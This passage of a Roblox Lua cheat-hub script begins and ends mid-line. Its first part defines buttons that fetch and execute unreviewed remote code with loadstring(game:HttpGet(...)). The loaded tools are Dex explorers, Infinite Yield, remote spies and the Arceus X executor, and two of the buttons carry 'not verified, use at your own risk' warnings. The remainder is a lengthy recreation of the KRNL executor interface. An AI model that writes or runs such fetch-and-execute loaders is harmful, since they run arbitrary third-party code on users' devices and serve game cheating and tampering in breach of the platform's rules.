V3", "dex", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Babyhamsta/RBLX_Scripts/main/Universal/BypassedDarkDexV3.lua", true))() end) Section:NewButton("Dex Explorer V2", "dex", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/MariyaFurmanova/Library/main/dex2.0", true))() end) Section:NewButton("Lazy Dex", "dex", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Babyhamsta/RBLX_Scripts/main/Universal/Lazy_Dex.lua"))() end) Section:NewLabel("Infinite Yield") Section:NewButton("Infinite Yield v6.1", "ButtonInfo", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))() end) Section:NewButton("Infinite Yield V5.6", "ButtonInfo", function() loadstring(game:HttpGet("https://cdn.wearedevs.net/scripts/Infinite%20Yield.txt"))() end) Section:NewLabel("Remote Spy") Section:NewButton("Simple Spy", "remote events", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://raw.githubusercontent.com/realredz/SimpleSpy/refs/heads/main/Mobile.lua"))() end) Section:NewButton("Remote Hub v1", "remote events", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/zephyr10101/RemoteHub/main/Main",true))() end) Section:NewButton("Turtle Spy", "yes cuz yes", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Turtle-Brand/Turtle-Spy/main/source.lua", true))() end) Section:NewLabel("Executers") Section:NewButton("Arceux X v3", "executer", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://raw.githubusercontent.com/AZYsGithub/chillz-workshop/main/Arceus%20X%20V3"))() end) Section:NewButton("KRNL", "KRNL", function() local KRNL = Instance.new("ScreenGui") local KrnlGUI = Instance.new("Frame") local FileButton = Instance.new("TextButton") local UITextSizeConstraint = Instance.new("UITextSizeConstraint") local CreditsButton = Instance.new("TextButton") local UITextSizeConstraint_2 = Instance.new("UITextSizeConstraint") local GamesButton = Instance.new("TextButton") local UITextSizeConstraint_3 = Instance.new("UITextSizeConstraint") local HotScriptsButton = Instance.new("TextButton") local UITextSizeConstraint_4 = Instance.new("UITextSizeConstraint") local OthersButton = Instance.new("TextButton") local UITextSizeConstraint_5 = Instance.new("UITextSizeConstraint") local SideGUI = Instance.new("Frame") local ImageLabel = Instance.new("ImageLabel") local TextLabel = Instance.new("TextLabel") local Xbutton = Instance.new("TextButton") local UITextSizeConstraint_6 = Instance.new("UITextSizeConstraint") local button = Instance.new("TextButton") local UITextSizeConstraint_7 = Instance.new("UITextSizeConstraint") local MainGUI = Instance.new("Frame") local ExecuteBar = Instance.new("Frame") local Frame = Instance.new("Frame") local Script1 = Instance.new("Frame") local TextButton = Instance.new("TextButton") local UITextSizeConstraint_8 = Instance.new("UITextSizeConstraint") local UITextSizeConstraint_9 = Instance.new("UITextSizeConstraint") local TextButton_2 = Instance.new("TextButton") local UITextSizeConstraint_10 = Instance.new("UITextSizeConstraint") local UITextSizeConstraint_11 = Instance.new("UITextSizeConstraint") local Script2 = Instance.new("Frame") local TextButton_3 = Instance.new("TextButton") local UITextSizeConstraint_12 = Instance.new("UITextSizeConstraint") local UITextSizeConstraint_13 = Instance.new("UITextSizeConstraint") local TextButton_4 = Instance.new("TextButton") local UITextSizeConstraint_14 = Instance.new("UITextSizeConstraint") local UITextSizeConstraint_15 = Instance.new("UITextSizeConstraint") local addbutton = Instance.new("TextButton") local ScrollingFrame1 = Instance.new("ScrollingFrame") local ImageLabel_2 = Instance.new("ImageLabel") local security = Instance.new("TextLabel") local EditorFrame = Instance.new("ScrollingFrame") local Source = Instance.new("TextBox") local Comments_ = Instance.new("TextLabel") local Globals_ = Instance.new("TextLabel") local Keywords_ = Instance.new("TextLabel") local RemoteHighlight_ = Instance.new("TextLabel") local Strings_ = Instance.new("TextLabel") local Tokens_ = Instance.new("TextLabel") local Numbers_ = Instance.new("TextLabel") local Lines = Instance.new("TextLabel") local ScrollingFrame2 = Instance.new("ScrollingFrame") local ImageLabel_3 = Instance.new("ImageLabel") local security_2 = Instance.new("TextLabel") local EditorFrame_2 = Instance.new("ScrollingFrame") local Source_2 = Instance.new("TextBox") local Comments__2 = Instance.new("TextLabel") local Globals__2 = Instance.new("TextLabel") local Keywords__2 = Instance.new("TextLabel") local RemoteHighlight__2 = Instance.new("TextLabel") local Strings__2 = Instance.new("TextLabel") local Tokens__2 = Instance.new("TextLabel") local Numbers__2 = Instance.new("TextLabel") local Lines_2 = Instance.new("TextLabel") local Execute = Instance.new("TextButton") local UITextSizeConstraint_16 = Instance.new("UITextSizeConstraint") local Clear = Instance.new("TextButton") local UITextSizeConstraint_17 = Instance.new("UITextSizeConstraint") local OpenFileButton = Instance.new("TextButton") local UITextSizeConstraint_18 = Instance.new("UITextSizeConstraint") local SaveFileButton = Instance.new("TextButton") local UITextSizeConstraint_19 = Instance.new("UITextSizeConstraint") local InjectButton = Instance.new("TextButton") local UITextSizeConstraint_20 = Instance.new("UITextSizeConstraint") local OptionButton = Instance.new("TextButton") local UITextSizeConstraint_21 = Instance.new("UITextSizeConstraint") local ScriptHub = Instance.new("ScrollingFrame") local UIAspectRatioConstraint = Instance.new("UIAspectRatioConstraint") local InjectedMessgae = Instance.new("Frame") local Frame_2 = Instance.new("Frame") local Xbutton_2 = Instance.new("TextButton") local UITextSizeConstraint_22 = Instance.new("UITextSizeConstraint") local TextLabel_2 = Instance.new("TextLabel") local Frame_3 = Instance.new("Frame") local Okbutton = Instance.new("TextButton") local UITextSizeConstraint_23 = Instance.new("UITextSizeConstraint") local TextLabel_3 = Instance.new("TextLabel") local UITextSizeConstraint_24 = Instance.new("UITextSizeConstraint") local HScriptsHub = Instance.new("Frame") local DexExplorer = Instance.new("TextButton") local UITextSizeConstraint_25 = Instance.new("UITextSizeConstraint") local OpenGui = Instance.new("TextButton") local UITextSizeConstraint_26 = Instance.new("UITextSizeConstraint") local RemoteSpy = Instance.new("TextButton") local UITextSizeConstraint_27 = Instance.new("UITextSizeConstraint") local DarkDex = Instance.new("TextButton") local UITextSizeConstraint_28 = Instance.new("UITextSizeConstraint") local UnamedEsp = Instance.new("TextButton") local UITextSizeConstraint_29 = Instance.new("UITextSizeConstraint") local IYFE = Instance.new("TextButton") local UITextSizeConstraint_30 = Instance.new("UITextSizeConstraint") local OwlHub = Instance.new("TextButton") local UITextSizeConstraint_31 = Instance.new("UITextSizeConstraint") local HoHoHub = Instance.new("TextButton") local UITextSizeConstraint_32 = Instance.new("UITextSizeConstraint") local BlueLight = Instance.new("Frame") local CreditsW = Instance.new("Frame") local Frame_4 = Instance.new("Frame") local Xbutton_3 = Instance.new("TextButton") local UITextSizeConstraint_33 = Instance.new("UITextSizeConstraint") local TextLabel_4 = Instance.new("TextLabel") local UITextSizeConstraint_34 = Instance.new("UITextSizeConstraint") local TextLabel_5 = Instance.new("TextLabel") local UITextSizeConstraint_35 = Instance.new("UITextSizeConstraint") local ImageLabel_4 = Instance.new("ImageLabel") local OtherTab = Instance.new("Frame") local WHy = Instance.new("TextButton") local UITextSizeConstraint_36 = Instance.new("UITextSizeConstraint") local Nope = Instance.new("TextButton") local UITextSizeConstraint_37 = Instance.new("UITextSizeConstraint") local FileTab = Instance.new("Frame") local KillTask = Instance.new("TextButton") local UITextSizeConstraint_38 = Instance.new("UITextSizeConstraint") local Inject = Instance.new("TextButton") local UITextSizeConstraint_39 = Instance.new("UITextSizeConstraint") local GamesOpenGUI = Instance.new("Frame") local Frame_5 = Instance.new("Frame") local Xbutton_4 = Instance.new("TextButton") local UITextSizeConstraint_40 = Instance.new("UITextSizeConstraint") local Frame_6 = Instance.new("Frame") local Okbutton_2 = Instance.new("TextButton") local UITextSizeConstraint_41 = Instance.new("UITextSizeConstraint") local TextLabel_6 = Instance.new("TextLabel") local UITextSizeConstraint_42 = Instance.new("UITextSizeConstraint") local UIAspectRatioConstraint_2 = Instance.new("UIAspectRatioConstraint") local FloatingGUI = Instance.new("ImageButton") --Properties: KRNL.Name = "KRNL" KRNL.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") KRNL.ZIndexBehavior = Enum.ZIndexBehavior.Sibling KRNL.ResetOnSpawn = false KrnlGUI.Name = "KrnlGUI" KrnlGUI.Parent = KRNL KrnlGUI.Active = true KrnlGUI.BackgroundColor3 = Color3.fromRGB(34, 34, 34) KrnlGUI.BorderColor3 = Color3.fromRGB(34, 34, 34) KrnlGUI.Position = UDim2.new(0, 137, 0, 141) KrnlGUI.Size = UDim2.new(0, 685, 0, 344) KrnlGUI.Visible = false FileButton.Name = "File Button" FileButton.Parent = KrnlGUI FileButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) FileButton.BackgroundTransparency = 1.000 FileButton.Position = UDim2.new(0.00264457078, 0, 0.0971021578, 0) FileButton.Size = UDim2.new(0.0666066185, 0, 0.0681233257, 0) FileButton.Font = Enum.Font.SourceSans FileButton.Text = "File" FileButton.TextColor3 = Color3.fromRGB(255, 255, 255) FileButton.TextScaled = true FileButton.TextSize = 16.000 FileButton.TextWrapped = true UITextSizeConstraint.Parent = FileButton UITextSizeConstraint.MaxTextSize = 16 CreditsButton.Name = "Credits Button" CreditsButton.Parent = KrnlGUI CreditsButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) CreditsButton.BackgroundTransparency = 1.000 CreditsButton.Position = UDim2.new(0.0700000003, 0, 0.0970000029, 0) CreditsButton.Size = UDim2.new(0.0666066185, 0, 0.0681233257, 0) CreditsButton.Font = Enum.Font.SourceSans CreditsButton.Text = "Credits" CreditsButton.TextColor3 = Color3.fromRGB(255, 255, 255) CreditsButton.TextScaled = true CreditsButton.TextSize = 16.000 CreditsButton.TextWrapped = true UITextSizeConstraint_2.Parent = CreditsButton UITextSizeConstraint_2.MaxTextSize = 16 GamesButton.Name = "Games Button" GamesButton.Parent = KrnlGUI GamesButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) GamesButton.BackgroundTransparency = 1.000 GamesButton.Position = UDim2.new(0.150000006, 0, 0.0970000029, 0) GamesButton.Size = UDim2.new(0.0666066185, 0, 0.0681233257, 0) GamesButton.Font = Enum.Font.SourceSans GamesButton.Text = "Games" GamesButton.TextColor3 = Color3.fromRGB(255, 255, 255) GamesButton.TextScaled = true GamesButton.TextSize = 15.000 GamesButton.TextWrapped = true UITextSizeConstraint_3.Parent = GamesButton UITextSizeConstraint_3.MaxTextSize = 15 HotScriptsButton.Name = "Hot Scripts Button" HotScriptsButton.Parent = KrnlGUI HotScriptsButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) HotScriptsButton.BackgroundTransparency = 1.000 HotScriptsButton.Position = UDim2.new(0.232577384, 0, 0.0970000103, 0) HotScriptsButton.Size = UDim2.new(0.0943726227, 0, 0.0681233257, 0) HotScriptsButton.Font = Enum.Font.SourceSans HotScriptsButton.Text = "Hot-Scripts" HotScriptsButton.TextColor3 = Color3.fromRGB(255, 255, 255) HotScriptsButton.TextScaled = true HotScriptsButton.TextSize = 15.000 HotScriptsButton.TextWrapped = true UITextSizeConstraint_4.Parent = HotScriptsButton UITextSizeConstraint_4.MaxTextSize = 15 OthersButton.Name = "Others Button" OthersButton.Parent = KrnlGUI OthersButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) OthersButton.BackgroundTransparency = 1.000 OthersButton.Position = UDim2.new(0.340016991, 0, 0.0970000103, 0) OthersButton.Size = UDim2.new(0.0682386607, 0, 0.0681233257, 0) OthersButton.Font = Enum.Font.SourceSans OthersButton.Text = "Others" OthersButton.TextColor3 = Color3.fromRGB(255, 255, 255) OthersButton.TextScaled = true OthersButton.TextSize = 15.000 OthersButton.TextWrapped = true UITextSizeConstraint_5.Parent = OthersButton UITextSizeConstraint_5.MaxTextSize = 15 SideGUI.Name = "Side GUI" SideGUI.Parent = KrnlGUI SideGUI.BackgroundColor3 = Color3.fromRGB(30, 30, 30) SideGUI.BorderColor3 = Color3.fromRGB(31, 31, 31) SideGUI.Size = UDim2.new(0.99889791, 0, 0.095630005, 0) ImageLabel.Parent = SideGUI ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel.BackgroundTransparency = 1.000 ImageLabel.Position = UDim2.new(0.00300000003, 0, 0.123999998, 0) ImageLabel.Size = UDim2.new(0.0361689702, 0, 0.726585209, 0) ImageLabel.Image = "rbxassetid://11671355800" TextLabel.Parent = SideGUI TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel.BackgroundTransparency = 1.000 TextLabel.Position = UDim2.new(0.465686679, 0, 0.136606336, 0) TextLabel.Size = UDim2.new(0.0694269463, 0, 0.726004899, 0) TextLabel.Font = Enum.Font.SourceSans TextLabel.Text = "KRNL" TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel.TextScaled = true TextLabel.TextSize = 20.000 TextLabel.TextWrapped = true Xbutton.Name = "X button" Xbutton.Parent = SideGUI Xbutton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Xbutton.BackgroundTransparency = 1.000 Xbutton.Position = UDim2.new(0.957000017, 0, 0.159999996, 0) Xbutton.Size = UDim2.new(0.0409558825, 0, 0.690584838, 0) Xbutton.Font = Enum.Font.SourceSans Xbutton.Text = "X" Xbutton.TextColor3 = Color3.fromRGB(255, 255, 255) Xbutton.TextSize = 40.000 Xbutton.TextStrokeColor3 = Color3.fromRGB(255, 255, 255) Xbutton.TextWrapped = true UITextSizeConstraint_6.Parent = Xbutton UITextSizeConstraint_6.MaxTextSize = 35 button.Name = "- button" button.Parent = SideGUI button.BackgroundColor3 = Color3.fromRGB(255, 255, 255) button.BackgroundTransparency = 1.000 button.Position = UDim2.new(0.910000026, 0, 0.159999996, 0) button.Size = UDim2.new(0.0409558825, 0, 0.690584838, 0) button.Font = Enum.Font.SourceSans button.Text = "−" button.TextColor3 = Color3.fromRGB(255, 255, 255) button.TextScaled = true button.TextSize = 35.000 button.TextStrokeColor3 = Color3.fromRGB(255, 255, 255) button.TextWrapped = true UITextSizeConstraint_7.Parent = button UITextSizeConstraint_7.MaxTextSize = 35 MainGUI.Name = "MainGUI" MainGUI.Parent = KrnlGUI MainGUI.BackgroundColor3 = Color3.fromRGB(17, 17, 17) MainGUI.BorderColor3 = Color3.fromRGB(0, 0, 0) MainGUI.Position = UDim2.new(0, 0, 0.168076977, 0) MainGUI.Size = UDim2.new(0.99999994, 0, 0.831923008, 0) ExecuteBar.Name = "ExecuteBar" ExecuteBar.Parent = MainGUI ExecuteBar.BackgroundColor3 = Color3.fromRGB(36, 36, 36) ExecuteBar.BorderColor3 = Color3.fromRGB(37, 37, 37) ExecuteBar.Position = UDim2.new(0.0070000249, 0, 0.00649997452, 0) ExecuteBar.Size = UDim2.new(0.803592086, 0, 0.88723731, 0) Frame.Parent = ExecuteBar Frame.BackgroundColor3 = Color3.fromRGB(50, 50, 50) Frame.BorderColor3 = Color3.fromRGB(50, 50, 50) Frame.Size = UDim2.new(0.999999881, 0, 0.0568133108, 0) Script1.Name = "Script1" Script1.Parent = Frame Script1.BackgroundColor3 = Color3.fromRGB(50, 50, 50) Script1.BorderColor3 = Color3.fromRGB(50, 50, 50) Script1.Position = UDim2.new(-0.00180647022, 0, 0, 0) Script1.Size = UDim2.new(0.156733111, 0, 1.00000775, 0) TextButton.Parent = Script1 TextButton.BackgroundColor3 = Color3.fromRGB(50, 50, 50) TextButton.BorderColor3 = Color3.fromRGB(50, 50, 50) TextButton.Size = UDim2.new(0.8415097, 0, 0.999998391, 0) TextButton.Font = Enum.Font.SourceSans TextButton.Text = "Script1.lua" TextButton.TextColor3 = Color3.fromRGB(255, 255, 255) TextButton.TextScaled = true TextButton.TextSize = 16.000 TextButton.TextWrapped = true UITextSizeConstraint_8.Parent = TextButton UITextSizeConstraint_8.MaxTextSize = 16 UITextSizeConstraint_9.Parent = TextButton UITextSizeConstraint_9.MaxTextSize = 16 TextButton_2.Parent = Script1 TextButton_2.BackgroundColor3 = Color3.fromRGB(50, 50, 50) TextButton_2.BorderColor3 = Color3.fromRGB(50, 50, 50) TextButton_2.Position = UDim2.new(0.841509819, 0, 0, 0) TextButton_2.Size = UDim2.new(0.158490166, 0, 0.952832103, 0) TextButton_2.Font = Enum.Font.SourceSans TextButton_2.Text = "X" TextButton_2.TextColor3 = Color3.fromRGB(255, 255, 255) TextButton_2.TextScaled = true TextButton_2.TextSize = 16.000 TextButton_2.TextWrapped = true UITextSizeConstraint_10.Parent = TextButton_2 UITextSizeConstraint_10.MaxTextSize = 16 UITextSizeConstraint_11.Parent = TextButton_2 UITextSizeConstraint_11.MaxTextSize = 16 Script2.Name = "Script2" Script2.Parent = Frame Script2.BackgroundColor3 = Color3.fromRGB(50, 50, 50) Script2.BorderColor3 = Color3.fromRGB(50, 50, 50) Script2.Position = UDim2.new(0.159876347, 0, 0, 0) Script2.Size = UDim2.new(0.156733111, 0, 1.00000775, 0) Script2.Visible = false TextButton_3.Parent = Script2 TextButton_3.BackgroundColor3 = Color3.fromRGB(50, 50, 50) TextButton_3.BorderColor3 = Color3.fromRGB(50, 50, 50) TextButton_3.Position = UDim2.new(-3.7252903e-09, 0, 0, 0) TextButton_3.Size = UDim2.new(0.8415097, 0, 0.999998391, 0) TextButton_3.Font = Enum.Font.SourceSans TextButton_3.Text = "Script2.lua" TextButton_3.TextColor3 = Color3.fromRGB(255, 255, 255) TextButton_3.TextScaled = true TextButton_3.TextSize = 16.000 TextButton_3.TextWrapped = true UITextSizeConstraint_12.Parent = TextButton_3 UITextSizeConstraint_12.MaxTextSize = 16 UITextSizeConstraint_13.Parent = TextButton_3 UITextSizeConstraint_13.MaxTextSize = 16 TextButton_4.Parent = Script2 TextButton_4.BackgroundColor3 = Color3.fromRGB(50, 50, 50) TextButton_4.BorderColor3 = Color3.fromRGB(50, 50, 50) TextButton_4.Position = UDim2.new(0.841509819, 0, 0, 0) TextButton_4.Size = UDim2.new(0.158490166, 0, 0.952832103, 0) TextButton_4.Font = Enum.Font.SourceSans TextButton_4.Text = "X" TextButton_4.TextColor3 = Color3.fromRGB(255, 255, 255) TextButton_4.TextScaled = true TextButton_4.TextSize = 16.000 TextButton_4.TextWrapped = true UITextSizeConstraint_14.Parent = TextButton_4 UITextSizeConstraint_14.MaxTextSize = 16 UITextSizeConstraint_15.Parent = TextButton_4 UITextSizeConstraint_15.MaxTextSize = 16 addbutton.Name = "addbutton" addbutton.Parent = Frame addbutton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) addbutton.BackgroundTransparency = 1.000 addbutton.Position = UDim2.new(0.154416174, 0, 0, 0) addbutton.Size = UDim2.new(0, 19, 0, 13) addbutton.Font = Enum.Font.SourceSans addbutton.Text = "+" addbutton.TextColor3 = Color3.fromRGB(255, 255, 255) addbutton.TextSize = 17.000 ScrollingFrame1.Name = "ScrollingFrame1" ScrollingFrame1.Parent = ExecuteBar ScrollingFrame1.Active = true ScrollingFrame1.BackgroundColor3 = Color3.fromRGB(40, 40, 40) ScrollingFrame1.BorderColor3 = Color3.fromRGB(40, 40, 40) ScrollingFrame1.Position = UDim2.new(0.0127166249, 0, 0.079058826, 0) ScrollingFrame1.Size = UDim2.new(0.973659992, 0, 0.917334437, 0) ScrollingFrame1.ScrollBarThickness = 10 ImageLabel_2.Parent = ScrollingFrame1 ImageLabel_2.BackgroundColor3 = Color3.fromRGB(47, 47, 47) ImageLabel_2.BackgroundTransparency = 1.000 ImageLabel_2.BorderSizePixel = 0 ImageLabel_2.Position = UDim2.new(0.00505135441, 0, -0.0532468483, 27) ImageLabel_2.Size = UDim2.new(0, 541, 0, 359) ImageLabel_2.ImageTransparency = 1.000 security.Name = "security" security.Parent = ImageLabel_2 security.BackgroundColor3 = Color3.fromRGB(255, 255, 255) security.Size = UDim2.new(0, 552, 0, 258) security.Visible = false security.Font = Enum.Font.SourceSans security.TextColor3 = Color3.fromRGB(0, 0, 0) security.TextSize = 14.000 EditorFrame.Name = "EditorFrame" EditorFrame.Parent = ImageLabel_2 EditorFrame.BackgroundColor3 = Color3.fromRGB(37, 37, 37) EditorFrame.BackgroundTransparency = 1.000 EditorFrame.BorderColor3 = Color3.fromRGB(61, 61, 61) EditorFrame.Size = UDim2.new(1, 0, 1, 0) EditorFrame.ZIndex = 3 EditorFrame.BottomImage = "rbxassetid://148970562" EditorFrame.CanvasSize = UDim2.new(0, 0, 0, 0) EditorFrame.HorizontalScrollBarInset = Enum.ScrollBarInset.ScrollBar EditorFrame.MidImage = "rbxassetid://148970562" EditorFrame.ScrollBarThickness = 5 EditorFrame.TopImage = "rbxassetid://148970562" Source.Name = "Source" Source.Parent = EditorFrame Source.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Source.BackgroundTransparency = 1.000 Source.Position = UDim2.new(0, 19, 0, 0) Source.Size = UDim2.new(0.965984941, 0, 1, 0) Source.ZIndex = 3 Source.ClearTextOnFocus = false Source.Font = Enum.Font.Code Source.MultiLine = true Source.PlaceholderColor3 = Color3.fromRGB(204, 204, 204) Source.Text = "--Welcome To KRNL Mobile!" Source.TextColor3 = Color3.fromRGB(204, 204, 204) Source.TextSize = 14.000 Source.TextXAlignment = Enum.TextXAlignment.Left Source.TextYAlignment = Enum.TextYAlignment.Top Comments_.Name = "Comments_" Comments_.Parent = Source Comments_.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Comments_.BackgroundTransparency = 1.000 Comments_.Size = UDim2.new(1, 0, 1, 0) Comments_.ZIndex = 5 Comments_.Font = Enum.Font.Code Comments_.Text = "" Comments_.TextColor3 = Color3.fromRGB(59, 200, 59) Comments_.TextSize = 14.000 Comments_.TextXAlignment = Enum.TextXAlignment.Left Comments_.TextYAlignment = Enum.TextYAlignment.Top Globals_.Name = "Globals_" Globals_.Parent = Source Globals_.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Globals_.BackgroundTransparency = 1.000 Globals_.Size = UDim2.new(1, 0, 1, 0) Globals_.ZIndex = 5 Globals_.Font = Enum.Font.Code Globals_.Text = "" Globals_.TextColor3 = Color3.fromRGB(85, 222, 154) Globals_.TextSize = 14.000 Globals_.TextXAlignment = Enum.TextXAlignment.Left Globals_.TextYAlignment = Enum.TextYAlignment.Top Keywords_.Name = "Keywords_" Keywords_.Parent = Source Keywords_.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Keywords_.BackgroundTransparency = 1.000 Keywords_.Size = UDim2.new(1, 0, 1, 0) Keywords_.ZIndex = 5 Keywords_.Font = Enum.Font.Code Keywords_.Text = "" Keywords_.TextColor3 = Color3.fromRGB(213, 53, 117) Keywords_.TextSize = 14.000 Keywords_.TextXAlignment = Enum.TextXAlignment.Left Keywords_.TextYAlignment = Enum.TextYAlignment.Top RemoteHighlight_.Name = "RemoteHighlight_" RemoteHighlight_.Parent = Source RemoteHighlight_.BackgroundColor3 = Color3.fromRGB(255, 255, 255) RemoteHighlight_.BackgroundTransparency = 1.000 RemoteHighlight_.Size = UDim2.new(1, 0, 1, 0) RemoteHighlight_.ZIndex = 5 RemoteHighlight_.Font = Enum.Font.Code RemoteHighlight_.Text = "" RemoteHighlight_.TextColor3 = Color3.fromRGB(0, 144, 255) RemoteHighlight_.TextSize = 14.000 RemoteHighlight_.TextXAlignment = Enum.TextXAlignment.Left RemoteHighlight_.TextYAlignment = Enum.TextYAlignment.Top Strings_.Name = "Strings_" Strings_.Parent = Source Strings_.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Strings_.BackgroundTransparency = 1.000 Strings_.Size = UDim2.new(1, 0, 1, 0) Strings_.ZIndex = 5 Strings_.Font = Enum.Font.Code Strings_.Text = "" Strings_.TextColor3 = Color3.fromRGB(229, 164, 60) Strings_.TextSize = 14.000 Strings_.TextXAlignment = Enum.TextXAlignment.Left Strings_.TextYAlignment = Enum.TextYAlignment.Top Tokens_.Name = "Tokens_" Tokens_.Parent = Source Tokens_.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Tokens_.BackgroundTransparency = 1.000 Tokens_.Size = UDim2.new(1, 0, 1, 0) Tokens_.ZIndex = 5 Tokens_.Font = Enum.Font.Code Tokens_.Text = "" Tokens_.TextColor3 = Color3.fromRGB(255, 255, 255) Tokens_.TextSize = 14.000 Tokens_.TextXAlignment = Enum.TextXAlignment.Left Tokens_.TextYAlignment = Enum.TextYAlignment.Top Numbers_.Name = "Numbers_" Numbers_.Parent = Source Numbers_.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Numbers_.BackgroundTransparency = 1.000 Numbers_.Size = UDim2.new(1, 0, 1, 0) Numbers_.ZIndex = 4 Numbers_.Font = Enum.Font.Code Numbers_.Text = "" Numbers_.TextColor3 = Color3.fromRGB(142, 71, 213) Numbers_.TextSize = 14.000 Numbers_.TextXAlignment = Enum.TextXAlignment.Left Numbers_.TextYAlignment = Enum.TextYAlignment.Top Lines.Name = "Lines" Lines.Parent = EditorFrame Lines.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Lines.BackgroundTransparency = 1.000 Lines.Position = UDim2.new(-0.00924214441, 0, 0, 0) Lines.Size = UDim2.new(0, 30, 1, 0) Lines.ZIndex = 4 Lines.Font = Enum.Font.SourceSans Lines.Text = "1\\n" Lines.TextColor3 = Color3.fromRGB(255, 255, 255) Lines.TextSize = 15.000 Lines.TextYAlignment = Enum.TextYAlignment.Top ScrollingFrame2.Name = "ScrollingFrame2" ScrollingFrame2.Parent = ExecuteBar ScrollingFrame2.Active = true ScrollingFrame2.BackgroundColor3 = Color3.fromRGB(40, 40, 40) ScrollingFrame2.BorderColor3 = Color3.fromRGB(40, 40, 40) ScrollingFrame2.Position = UDim2.new(0.0127166249, 0, 0.079058826, 0) ScrollingFrame2.Size = UDim2.new(0.973659992, 0, 0.917334437, 0) ScrollingFrame2.Visible = false ScrollingFrame2.ScrollBarThickness = 10 ImageLabel_3.Parent = ScrollingFrame2 ImageLabel_3.BackgroundColor3 = Color3.fromRGB(47, 47, 47) ImageLabel_3.BackgroundTransparency = 1.000 ImageLabel_3.BorderSizePixel = 0 ImageLabel_3.Position = UDim2.new(0.00505135441, 0, -0.0532468483, 27) ImageLabel_3.Size = UDim2.new(0, 541, 0, 359) ImageLabel_3.ImageTransparency = 1.000 security_2.Name = "security" security_2.Parent = ImageLabel_3 security_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) security_2.Size = UDim2.new(0, 552, 0, 258) security_2.Visible = false security_2.Font = Enum.Font.SourceSans security_2.TextColor3 = Color3.fromRGB(0, 0, 0) security_2.TextSize = 14.000 EditorFrame_2.Name = "EditorFrame" EditorFrame_2.Parent = ImageLabel_3 EditorFrame_2.BackgroundColor3 = Color3.fromRGB(37, 37, 37) EditorFrame_2.BackgroundTransparency = 1.000 EditorFrame_2.BorderColor3 = Color3.fromRGB(61, 61, 61) EditorFrame_2.Size = UDim2.new(1, 0, 1, 0) EditorFrame_2.ZIndex = 3 EditorFrame_2.BottomImage = "rbxassetid://148970562" EditorFrame_2.CanvasSize = UDim2.new(0, 0, 0, 0) EditorFrame_2.HorizontalScrollBarInset = Enum.ScrollBarInset.ScrollBar EditorFrame_2.MidImage = "rbxassetid://148970562" EditorFrame_2.ScrollBarThickness = 5 EditorFrame_2.TopImage = "rbxassetid://148970562" Source_2.Name = "Source" Source_2.Parent = EditorFrame_2 Source_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Source_2.BackgroundTransparency = 1.000 Source_2.Position = UDim2.new(0, 19, 0, 0) Source_2.Size = UDim2.new(0.965984941, 0, 1, 0) Source_2.ZIndex = 3 Source_2.ClearTextOnFocus = false Source_2.Font = Enum.Font.Code Source_2.MultiLine = true Source_2.PlaceholderColor3 = Color3.fromRGB(204, 204, 204) Source_2.Text = "--Welcome To KRNL Mobile!" Source_2.TextColor3 = Color3.fromRGB(204, 204, 204) Source_2.TextSize = 14.000 Source_2.TextXAlignment = Enum.TextXAlignment.Left Source_2.TextYAlignment = Enum.TextYAlignment.Top Comments__2.Name = "Comments_" Comments__2.Parent = Source_2 Comments__2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Comments__2.BackgroundTransparency = 1.000 Comments__2.Size = UDim2.new(1, 0, 1, 0) Comments__2.ZIndex = 5 Comments__2.Font = Enum.Font.Code Comments__2.Text = "" Comments__2.TextColor3 = Color3.fromRGB(59, 200, 59) Comments__2.TextSize = 14.000 Comments__2.TextXAlignment = Enum.TextXAlignment.Left Comments__2.TextYAlignment = Enum.TextYAlignment.Top Globals__2.Name = "Globals_" Globals__2.Parent = Source_2 Globals__2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Globals__2.BackgroundTransparency = 1.000 Globals__2.Size = UDim2.new(1, 0, 1, 0) Globals__2.ZIndex = 5 Globals__2.Font = Enum.Font.Code Globals__2.Text = "" Globals__2.TextColor3 = Color3.fromRGB(85, 222, 154) Globals__2.TextSize = 14.000 Globals__2.TextXAlignment = Enum.TextXAlignment.Left Globals__2.TextYAlignment = Enum.TextYAlignment.Top Keywords__2.Name = "Keywords_" Keywords__2.Parent = Source_2 Keywords__2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Keywords__2.BackgroundTransparency = 1.000 Keywords__2.Size = UDim2.new(1, 0, 1, 0) Keywords__2.ZIndex = 5 Keywords__2.Font = Enum.Font.Code Keywords__2.Text = "" Keywords__2.TextColor3 = Color3.fromRGB(213, 53, 117) Keywords__2.TextSize = 14.000 Keywords__2.TextXAlignment = Enum.TextXAlignment.Left Keywords__2.TextYAlignment = Enum.TextYAlignment.Top RemoteHighlight__2.Name = "RemoteHighlight_" RemoteHighlight__2.Parent = Source_2 RemoteHighlight__2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 